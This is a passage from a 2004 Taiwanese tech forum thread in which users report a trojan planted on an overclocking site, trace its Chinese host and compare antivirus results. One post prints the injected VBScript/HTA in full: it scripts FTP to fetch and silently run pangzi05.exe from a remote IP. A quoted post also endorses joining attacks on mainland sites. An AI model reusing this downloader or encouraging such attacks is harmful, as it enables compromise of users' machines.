PCDVD數位科技討論區
第2頁 共4頁 上一頁 1 2 3 4 下一頁
每頁顯示此主題的 10 個文章

PCDVD數位科技討論區 (https://www.pcdvd.com.tw/index.php)
-   疑難雜症區 (https://www.pcdvd.com.tw/forumdisplay.php?f=34)
-   -   "超頻者天堂"網站被植入木馬~ (https://www.pcdvd.com.tw/showthread.php?t=358275)

Serron 2004-07-17 02:01 PM
引用:
Originally posted by 特地來找你
不是執行"ftp"程式,而是該強行植入的木馬其中的一個叫做"ftp",並非一般的ftp程式~

連這次也算的話,小弟一共中過5次這隻木馬,雖 然解這隻木馬不難,但實在解到很煩了!

....... ╮(╯_╰)╭ ,另外3721(網路實名)小弟已經忘了中過多少次~

小弟上網的習慣,向來都把ie的"安全性"調最低,以便讀取最完整的網頁資料,不會因為

怕木馬,而讓自己上網習慣有所改變~

國內若有人對大陸網站發動"訪問",小弟應會參加一腳,給對岸的俗辣一點顏色看看,讓

對岸知道tw不是好惹的~


再來就看看超頻者天堂怎麼做啦....~


可是他要執行:
File Version : 5.1.2600.0 (xpclient.xxxxxx-xxxx)
File Description : File Transfer Program (ftp.exe)
File Path : C:\WINDOWS\system32\ftp.exe

File Path : C:\WINDOWS\system32\mshat.exe

u8526425 2004-07-17 04:42 PM
友站IIS網管有看到的話
建議參考這裡
儘快查修一下
http://support.microsoft.com/?kbid=871277

jimi74 2004-07-17 06:31 PM
怪怪的,一進網頁馬上就會被導引進這個位址:61.163.238.XX
當然是禁止

u8526425 2004-07-17 06:54 PM
引用:
Originally posted by jimi74
怪怪的,一進網頁馬上就會被導引進這個位址:61.163.238.XX
當然是禁止

你用nslook去查zhu.7xi.org
(Serron網友po的程式碼中載明)
主機即為61.163.238.51
是大陸過來的東西
http://www.apnic.net/apnic-bin/whoi...h=61.163.238.51
只有16個ip
應該是個體戶

其name server是218.244.47.5
是北京的Feihua Communication Technology Co.Ltd.
http://www.apnic.net/apnic-bin/whoi...ch=218.244.47.5

確實可疑
建議暫時不要去閒晃

jackeric 2004-07-17 07:51 PM
引用:
Originally posted by 特地來找你
不是執行"ftp"程式,而是該強行植入的木馬其中的一個叫做"ftp",並非一般的ftp程式~

連這次也算的話,小弟一共中過5次這隻木馬,雖 然解這隻木馬不難,但實在解到很煩了!

....... ╮(╯_╰)╭ ,另外3721(網路實名)小弟已經忘了中過多少次~

小弟上網的習慣,向來都把ie的"安全性"調最低,以便讀取最完整的網頁資料,不會因為

怕木馬,而讓自己上網習慣有所改變~

國內若有人對大陸網站發動"訪問",小弟應會參加一腳,給對岸的俗辣一點顏色看看,讓

對岸知道tw不是好惹的~


再來就看看超頻者天堂怎麼做啦....~


3721(網路實名)----這是木馬???
能解釋嗎 我也有中這一個東西

zoodong 2004-07-18 02:45 AM
引用:
Originally posted by vict1
:confused: 我的KAV有抓出來說

這是誤判嗎


+1..我的kav也有抓到

壹伍貳參 2004-07-18 03:05 AM
Symantec AntiVirus 無法發現

darksnow 2004-07-18 03:24 AM
ng.test內容

<HTA:APPLICATION caption="no" border="none" showInTaskBar="yes"
windowState="minimize">
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script language="VBScript">
Dim fs, t
Set fs = CreateObject("Scripting.FileSystemObject")
Set t = fs.CreateTextFile("163.txt",True)
t.WriteLine("open 61.163.238.51")
t.WriteLine("nh")
t.WriteLine("nh")
t.WriteLine("lcd c:\")
t.WriteLine("bin")
t.WriteLine("get pangzi05.exe")
t.WriteLine("bye")
t.Close
wsh.Run "ftp -s:163.txt",0,true
wsh.Run "c:\pangzi05.exe"
fs.DeleteFile "163.txt",true
window.close
window.close
</script>

壹伍貳參 2004-07-18 03:48 AM
掃描類型: 即時防護掃描

事件: 發現病毒!

病毒名稱:Bloodhound.Packed

檔案: C:\pangzi05.exe

位置: 隔離所

電腦: #@%^%#

使用者: ABCAAKLAK

採取的動作: 清除 失敗 : 隔離 成功 : 拒絕存取



病毒在超頻者天堂網站
剛才更新病毒碼...OK
:D

hjfrank 2004-07-18 04:26 AM
引用:
Originally posted by jackeric
3721(網路實名)----這是木馬??? 能解釋嗎 我也有中這一個東西






不能算是。


所有的時間均為GMT +8。 現在的時間是06:02 PM.
第2頁 共4頁 上一頁 1 2 3 4 下一頁
每頁顯示此主題的 10 個文章

vBulletin Version 3.0.1
powered_by_vbulletin 2025。